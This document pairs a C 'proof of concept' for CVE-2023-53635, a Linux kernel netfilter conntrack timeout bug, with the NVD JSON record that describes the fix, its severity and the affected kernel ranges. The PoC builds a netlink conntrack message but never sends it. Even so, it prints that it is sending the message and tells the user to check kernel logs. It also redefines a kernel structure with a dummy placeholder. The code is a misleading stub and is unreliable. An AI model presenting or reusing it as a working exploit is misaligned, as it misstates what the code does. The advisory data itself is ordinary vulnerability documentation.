CVE-2023-53635

/* CVE-2023-53635 - Linux kernel netfilter conntrack timeout value error * * This PoC demonstrates triggering the bug via nfnetlink_queue conntrack support. * The vulnerability causes incorrect ct->timeout value handling. * * Note: This requires local low-privilege access and appropriate kernel capabilities * (NET_ADMIN) to interact with netfilter subsystems. */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/socket.h> #include <linux/netlink.h> #include <linux/netfilter.h> #include <linux/netfilter/nfnetlink.h> #include <linux/netfilter/nfnetlink_conntrack.h> #include <linux/netfilter/nf_conntrack_common.h> // Simplified structure for triggering the conntrack timeout bug struct nf_conntrack_tuple { unsigned char dummy[64]; }; int main(int argc, char *argv[]) { int sock_fd; struct sockaddr_nl src_addr, dest_addr; struct nlmsghdr *nlh; struct nfgenmsg *nfmsg; char buffer[4096]; printf("CVE-2023-53635 PoC - Linux kernel netfilter conntrack timeout bug\n"); printf("This PoC attempts to trigger the timeout value miscalculation\n"); printf("in ctnetlink_change_timeout() and ctnetlink_dump_timeout().\n\n"); // Create netlink socket for nfnetlink communication sock_fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_NETFILTER); if (sock_fd < 0) { perror("socket creation failed (need NET_ADMIN capability)"); return 1; } memset(&src_addr, 0, sizeof(src_addr)); src_addr.nl_family = AF_NETLINK; src_addr.nl_pid = getpid(); bind(sock_fd, (struct sockaddr *)&src_addr, sizeof(src_addr)); memset(&dest_addr, 0, sizeof(dest_addr)); dest_addr.nl_family = AF_NETLINK; dest_addr.nl_pid = 0; // Kernel // Prepare netlink message to manipulate conntrack timeout // This would trigger the bug where nfct_time_stamp is added twice // when setting timeout on an unconfirmed conntrack nlh = (struct nlmsghdr *)buffer; nlh->nlmsg_len = NLMSG_LENGTH(sizeof(struct nfgenmsg)); nlh->nlmsg_pid = getpid(); nlh->nlmsg_type = (NFNL_SUBSYS_CTNETLINK << 8) | CTNL_MSG_CTNEW; nlh->nlmsg_flags = NLM_F_REQUEST | NLM_F_CREATE | NLM_F_EXCL; nfmsg = (struct nfgenmsg *)NLMSG_DATA(nlh); nfmsg->nfgen_family = AF_INET; nfmsg->version = NFNETLINK_V0; nfmsg->res_id = 0; printf("Sending netlink message to trigger conntrack timeout bug...\n"); // Note: Full exploitation requires crafting proper conntrack tuple // and attributes. The bug manifests when: // 1. Creating an unconfirmed conntrack via ctnetlink // 2. Setting timeout via ctnetlink_change_timeout() // 3. The timeout value will be incorrectly calculated close(sock_fd); printf("PoC execution completed. Check kernel logs for any issues.\n"); return 0; }

{"cve": {"id": "CVE-2023-53635", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-07T16:15:46.643", "lastModified": "2026-02-03T22:25:58.240", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: conntrack: fix wrong ct->timeout value\n\n(struct nf_conn)->timeout is an interval before the conntrack\nconfirmed. After confirmed, it becomes a timestamp.\n\nIt is observed that timeout of an unconfirmed conntrack:\n- Set by calling ctnetlink_change_timeout(). As a result,\n `nfct_time_stamp` was wrongly added to `ct->timeout` twice.\n- Get by calling ctnetlink_dump_timeout(). As a result,\n `nfct_time_stamp` was wrongly subtracted.\n\nCall Trace:\n <TASK>\n dump_stack_lvl\n ctnetlink_dump_timeout\n __ctnetlink_glue_build\n ctnetlink_glue_build\n __nfqnl_enqueue_packet\n nf_queue\n nf_hook_slow\n ip_mc_output\n ? __pfx_ip_finish_output\n ip_send_skb\n ? __pfx_dst_output\n udp_send_skb\n udp_sendmsg\n ? __pfx_ip_generic_getfrag\n sock_sendmsg\n\nSeparate the 2 cases in:\n- Setting `ct->timeout` in __nf_ct_set_timeout().\n- Getting `ct->timeout` in ctnetlink_dump_timeout().\n\nPablo appends:\n\nUpdate ctnetlink to set up the timeout _after_ the IPS_CONFIRMED flag is\nset on, otherwise conntrack creation via ctnetlink breaks.\n\nNote that the problem described in this patch occurs since the\nintroduction of the nfnetlink_queue conntrack support, select a\nsufficiently old Fixes: tag for -stable kernel to pick up this fix."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.4", "versionEndExcluding": "6.1.28", "matchCriteriaId": "F875F189-5A7F-44CD-BA8A-D6B7C9809826"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2", "versionEndExcluding": "6.2.15", "matchCriteriaId": "3844A90B-940D-46C3-8D7B-9FF63F1AFC2F"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.3", "versionEndExcluding": "6.3.2", "matchCriteriaId": "38F6F330-91A0-4675-8B90-6F950471A7CC"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/73db1b8f2bb6725b7391e85aab41fdf592b3c0c1", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/80c5ba0078e20d926d11d0778f9a43902664ebf0", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/f612ae1ab4793701caf39386fb3b7f4b3ef44e48", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/ff5e4ac8dd7be7f1faba955c5779a68571eeb0f8", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}